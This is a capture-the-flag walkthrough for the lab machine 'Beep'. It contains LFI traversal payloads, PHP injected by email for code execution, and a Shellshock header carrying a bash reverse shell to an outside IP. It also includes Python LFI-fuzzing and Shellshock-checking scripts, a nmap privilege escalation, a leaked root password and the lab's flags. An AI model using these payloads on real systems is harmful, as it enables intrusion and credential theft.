Linux Boxes

beep

  1. nmap
  2. http
    1. gobuster
      1. /help
        1. beep backup date 2010
      2. /admin
      3. /mail
      4. /recordings
      5. /vtigercrm
  3. rooting box through LFI turned to RCE
    1. graph.php LFI
    2. /vtigercrm/graph.php?current_language exploit
      1. pw
      2. ssh root
    3. more LFI exploit info gathering w/ burp
      1. /etc/passwd
        1. /etc/passwd users
      2. /proc/self/status
        1. /var/lib/asterisk/.ssh/id_rsa
      3. leaking more sensitive files with burp suite's intruder
        1. fuzzdb github
          1. LFI-LogFileCheck.txt
        2. fuzzdb LFI checklist
          1. results
    4. foothold: turning LFI to RCE through SMTP php code embedded email
      1. php code injection into email
      2. burp payload test
        1. code execution
      3. swap to post request for reverse shell
        1. nc listener
        2. sudo -l
          1. asterisk can sudo on /etc/passwd
  4. rooting box w/ shellshock
    1. burp /bin/echo
    2. burp sleep
    3. shellshock reverse shell
    4. listener
  5. rooting box w/ RCE searchsploit
    1. priv esc w/ sudo nmap --interactive privesc
  6. user/root
  7. lessons learned

beep

images/334-1.png
images/334-2.png

nmap

images/336-1.png
images/336-2.png

http

images/1959-1.png

gobuster

gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k

after checking each of the directories, there is not much that helps us besides /admin, which leaks the FreePBX version; feel free to navigate to each page at your own discretion

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.7
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/02/29 19:18:46 Starting gobuster
===============================================================
/images (Status: 301)
/help (Status: 301)
/themes (Status: 301)
/modules (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
/vtigercrm (Status: 301)
===============================================================
2020/02/29 20:06:08 Finished
===============================================================

/help

this big, convoluted dashboard looks like it could hold some interesting finds, but it is mostly a rabbit hole that wastes time and energy; the only useful detail is the backup date below

images/595-1.png

beep backup date 2010

images/596-1.png

/admin

unfortunately we can't access the admin config page, but we see that the box is using FreePBX version 2.8.1.4!
images/598-1.png

images/598-2.png

/mail

login page; we could brute force it with hydra/medusa, but right now we have no idea what the username might be, move on
images/599-1.png

/recordings

another potential brute force candidate but we don't know enough information on what the login might be, move on

images/606-1.png

/vtigercrm

another potential brute force candidate but we don't know enough information on what the login might be, move on

images/608-1.png

rooting box through LFI turned to RCE

Since the webpage runs
images/597-1.png
let's see if anything from searchsploit comes up

images/597-2.png

images/597-3.png
images/597-4.png
we know the box runs on
images/597-5.png
so the RCE exploit also checks out

the local file inclusion exploit seems interesting, plus we know FreePBX is on version 2.8.1.4

graph.php LFI

Lets take a look at the exploit code:

we see the LFI Exploit is located at the URL:
/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

and gobuster already showed /vtigercrm on beep, so let's try it

images/609-1.png

images/609-2.png

/vtigercrm/graph.php?current_language exploit

/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
images/610-1.png

pw

fortunately enough, amportal.conf holds the FreePBX/Asterisk credentials, and the password jEhdIekWmdjE listed there is reused for root; we'll still explore alternative ways of rooting this machine


ssh root

the root password jEhdIekWmdjE works; it is one of the passwords listed in the amportal.conf file we read through the LFI exploit from searchsploit
images/593-1.png

more LFI exploit info gathering w/ burp

we can enumerate more info on the box using our LFI exploit:

we can view other sensitive files by substituting their paths where /etc/amportal.conf is right now...
images/611-1.png

/etc/passwd

images/612-1.png

/etc/passwd users

here are the accounts whose shell is not "nologin":


root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
news:x:9:13:news:/etc/news:
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash


we can tell which accounts are real, interactive users by the "/bin/bash" shell and which are service accounts by "nologin" (or sync/halt/shutdown); given that, the users are: root, mysql, cyrus, asterisk, spamfilter and fanis

/proc/self/status

we are running as Uid 100 and Gid 101; /etc/passwd maps that pair to the "asterisk" account, so the web server (and therefore everything our LFI reads) runs as asterisk

we're leaking the
images/616-1.png
directory from the box
images/616-2.png

images/616-3.png

/var/lib/asterisk/.ssh/id_rsa

If we can exfiltrate asterisk's private key we get an easy win on the box, so it's always worth trying
images/617-1.png

images/617-2.png

no luck, lets move on

leaking more sensitive files with burp suite's intruder

we can use intruder to enumerate more important files through this LFI that may be worth looking into:

images/615-1.png

fuzzdb github

we're going to use fuzzdb to find a list of file directories we can fuzz into our LFI input to enumerate
images/618-1.png

LFI-LogFileCheck.txt

Bingo! LFI-LogFileCheck.txt is a great list of default log and sensitive file locations to use as the Intruder payload

images/619-1.png

fuzzdb LFI checklist

now paste the
images/620-1.png
into the burp suite intruder payload options list and start the attack

images/620-2.png

results

not much luck: every path except /etc/passwd came back with the same 232-byte response, which is what graph.php returns when the file doesn't exist, so sorting Intruder results by length is the quick way to spot real hits

images/621-1.png

the 232-byte "invalid" response reads:
images/621-2.png
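added example, not part of the original writeup: the Intruder run above as a script. the target, the graph.php endpoint, the traversal depth and the 232-byte not-found length are taken from the notes; the wordlist paths, the fake_fetch stand-in and the PASSWD_SAMPLE text (the /etc/passwd lines recovered above, reused here as constructed input) are assumptions so it can run offline. it also does the /etc/passwd "real users" filtering from the earlier step.

```python
import os.path
import ssl
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Tuple

# Target and endpoint are the ones from the writeup; everything else is assumed.
TARGET = "https://10.10.10.7"
LFI_ENDPOINT = "/vtigercrm/graph.php"
TRAVERSAL = "../" * 8            # same depth as the searchsploit PoC URL
NOT_FOUND_LEN = 232              # length of the "no such file" response seen in Intruder


def build_lfi_url(path: str) -> str:
    """Return the graph.php LFI URL for an absolute path on the box.

    The trailing %00 truncates the suffix graph.php appends to current_language;
    null-byte truncation only works on PHP < 5.3.4, which this box still runs.
    """
    return (f"{TARGET}{LFI_ENDPOINT}?current_language={TRAVERSAL}{path}%00"
            "&module=Accounts&action")


def http_fetch(url: str, timeout: float = 10.0) -> Tuple[int, bytes]:
    """GET a URL over HTTPS without certificate checks (self-signed cert, like gobuster -k)."""
    ctx = ssl._create_unverified_context()
    req = urllib.request.Request(url, headers={"User-Agent": "lfi-fuzz"})
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def fuzz_lfi(paths: List[str],
             fetch: Callable[[str], Tuple[int, bytes]] = http_fetch,
             not_found_len: int = NOT_FOUND_LEN) -> Dict[str, int]:
    """Try every candidate path through the LFI and keep the ones whose response
    length differs from the not-found baseline (what sorting Intruder by length did)."""
    hits: Dict[str, int] = {}
    for path in paths:
        status, body = fetch(build_lfi_url(path))
        if status == 200 and len(body) != not_found_len:
            hits[path] = len(body)
    return hits


def interactive_users(passwd: str) -> List[str]:
    """Account names from /etc/passwd whose login shell is a real shell
    (drops nologin, sync, halt, shutdown and empty shells)."""
    shells = {"bash", "sh", "dash", "zsh", "ksh"}
    users = []
    for line in passwd.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and os.path.basename(fields[6]) in shells:
            users.append(fields[0])
    return users


# Constructed sample: the /etc/passwd lines the writeup recovered, used for an
# offline run of the fuzzer with a fake fetch function instead of the box.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
news:x:9:13:news:/etc/news:
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
spamfilter:x:500:500::/home/spamfilter:/bin/bash
fanis:x:501:501::/home/fanis:/bin/bash
"""


def fake_fetch(url: str) -> Tuple[int, bytes]:
    """Offline stand-in for http_fetch (assumed): only /etc/passwd 'exists'."""
    if "/etc/passwd%00" in url:
        return 200, PASSWD_SAMPLE.encode()
    return 200, b"x" * NOT_FOUND_LEN


if __name__ == "__main__":
    # Swap fetch=http_fetch (the default) to run this against the real box.
    wordlist = ["/etc/passwd", "/var/log/httpd/access_log",
                "/var/lib/asterisk/.ssh/id_rsa"]
    for path, size in fuzz_lfi(wordlist, fetch=fake_fetch).items():
        print(f"{size:6d}  {path}")
    print(interactive_users(PASSWD_SAMPLE))
```

to run it for real, point `paths` at the fuzzdb LFI-LogFileCheck.txt entries and leave `fetch` at its default; anything whose length is not 232 is worth reading by hand.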

foothold: turning LFI to RCE through SMTP php code embedded email

The server was listening on SMTP (port 25), so let's telnet to it:

images/622-1.png

the banner says ESMTP Postfix (Extended SMTP), so we send an EHLO and identify ourselves (an arbitrary name is fine)

images/622-2.png

from here let's VRFY that asterisk is a valid local user; Postfix answers with code 252, meaning it will accept mail for that address
images/622-3.png

compared to a 550 for a user that doesn't exist:
images/622-4.png


php code injection into email

images/623-1.png

now that we've injected a PHP command-execution stub into asterisk's mailbox through an SMTP email, the only thing left is to test whether it worked:

burp payload test

the /var/mail/asterisk file is where the body of our email should have landed on the server, so that is the path to include:
images/624-1.png

code execution

let's set the ippsec parameter to whoami and check that we get asterisk back in the server response

images/626-1.png


Success!

swap to post request for reverse shell

Code before URL encoding:
images/627-1.png
After Ctrl+U to URL encode:
images/627-2.png

nc listener

Success! We have a shell

images/628-1.png

images/628-2.png

sudo -l

images/630-1.png

asterisk can sudo on /etc/passwd

alternative approach we can look into

images/631-1.png

rooting box w/ shellshock

Based on the date the box was built (the 2010 backup), its bash is probably old enough to be susceptible to a Shellshock exploit

images/633-1.png


burp /bin/echo

User-Agent: () { :; }; /bin/echo "helloworld"
images/625-1.png

nothing shows up in the server response, but that doesn't rule Shellshock out: the command runs while bash imports the environment, and its output can be swallowed or break the response, so a blind, time-based check is more reliable. let's try sleep next
images/625-2.png
images/625-3.png

before we move on, take note of the bytes returned and the time it took to respond; that is the baseline the sleep request gets compared against
images/625-4.png

burp sleep

images/634-1.png
SUCCESS: the response took just over 10 seconds to complete, so the injected sleep ran on the server
images/634-2.png
images/634-3.png

shellshock reverse shell

bash -i >& /dev/tcp/10.10.14.62/8081 0>&1 to connect back to our attacking machine:
images/636-1.png

images/636-2.png

listener

images/635-1.png
wait for it... Success! we have root
images/635-2.png
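added example, not part of the original writeup: the Shellshock User-Agent check above as a script, plus the matching detection over access-log lines so the same payloads can be spotted from the blue side. the header format, the echo/sleep/reverse-shell commands and the attacker IP are from the notes; the probe URL argument, the 10-second threshold handling and the SAMPLE_LOG lines (constructed, in Apache combined format) are assumptions.

```python
import re
import ssl
import time
import urllib.error
import urllib.request
from typing import Dict, List

# Shellshock (CVE-2014-6271): bash evaluates the text after a function definition
# "() { ... };" arriving in an environment variable, and CGI handlers export
# request headers such as User-Agent as environment variables.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*?)"?$')


def shellshock_header(cmd: str) -> Dict[str, str]:
    """The User-Agent used in the writeup, with an arbitrary trailing command."""
    return {"User-Agent": f"() {{ :; }}; {cmd}"}


def is_shellshock_vulnerable(url: str, delay: int = 10) -> bool:
    """Time-based check: send /bin/sleep <delay> and see whether the response is
    delayed by at least that long. Compare against a normal request first; the
    sleep's output never appears in the body, only the delay does."""
    ctx = ssl._create_unverified_context()   # self-signed cert on the box
    req = urllib.request.Request(url, headers=shellshock_header(f"/bin/sleep {delay}"))
    start = time.monotonic()
    try:
        urllib.request.urlopen(req, timeout=delay + 15, context=ctx).read()
    except urllib.error.URLError:
        pass   # a 500 or dropped connection after the delay still counts
    return time.monotonic() - start >= delay


def classify(cmd: str) -> str:
    """Rough intent of the injected command, for triage."""
    if "/dev/tcp" in cmd or re.search(r"\b(nc|ncat)\b", cmd):
        return "reverse-shell"
    if "sleep" in cmd:
        return "timing-probe"
    if "echo" in cmd:
        return "echo-probe"
    return "other"


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Find Shellshock attempts anywhere in an access-log line, not only in the
    User-Agent: Referer, Cookie and custom headers reach CGI the same way."""
    hits = []
    for line in lines:
        match = SHELLSHOCK_RE.search(line)
        if match:
            cmd = match.group("cmd")
            hits.append({"ip": line.split(" ", 1)[0], "cmd": cmd, "kind": classify(cmd)})
    return hits


# Constructed sample log (assumed paths and sizes) carrying the three payloads
# from the writeup plus one benign request.
SAMPLE_LOG = r'''
10.10.14.62 - - [29/Feb/2020:20:20:01 +0000] "GET / HTTP/1.1" 200 1582 "-" "Mozilla/5.0"
10.10.14.62 - - [29/Feb/2020:20:21:10 +0000] "GET / HTTP/1.1" 200 1582 "-" "() { :; }; /bin/echo \"helloworld\""
10.10.14.62 - - [29/Feb/2020:20:22:35 +0000] "GET / HTTP/1.1" 200 1582 "-" "() { :; }; /bin/sleep 10"
10.10.14.62 - - [29/Feb/2020:20:24:03 +0000] "GET / HTTP/1.1" 500 0 "-" "() { :; }; bash -i >& /dev/tcp/10.10.14.62/8081 0>&1"
'''.strip().splitlines()


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']}  {hit['kind']:14s}  {hit['cmd']}")
    # Against a live CGI endpoint (assumed URL):
    # print(is_shellshock_vulnerable("https://10.10.10.7/cgi-bin/example"))
```

the detection regex keys on the function-definition prefix rather than on any particular command, so it also catches payloads that use a different header or a different body than `:;`.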

rooting box w/ RCE searchsploit

Lets go back to searchsploit and look up the RCE script

images/629-1.png


images/629-2.png
images/629-3.png


the code shows that old nmap's --interactive mode lets you drop to a shell by issuing
'!sh'
and since sudo -l showed nmap can be run with sudo, that shell is root; let's give it a shot from our shell...

priv esc w/ sudo nmap --interactive privesc

simple initiation of nmap --interactive with sudo gives a shell that has root privileges!

images/632-1.png

user/root

images/637-1.png
aeff3def0c765c2677b94715cffa73ac

images/637-2.png
d88e006123842106982acce0aaf453f0

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1960-1.png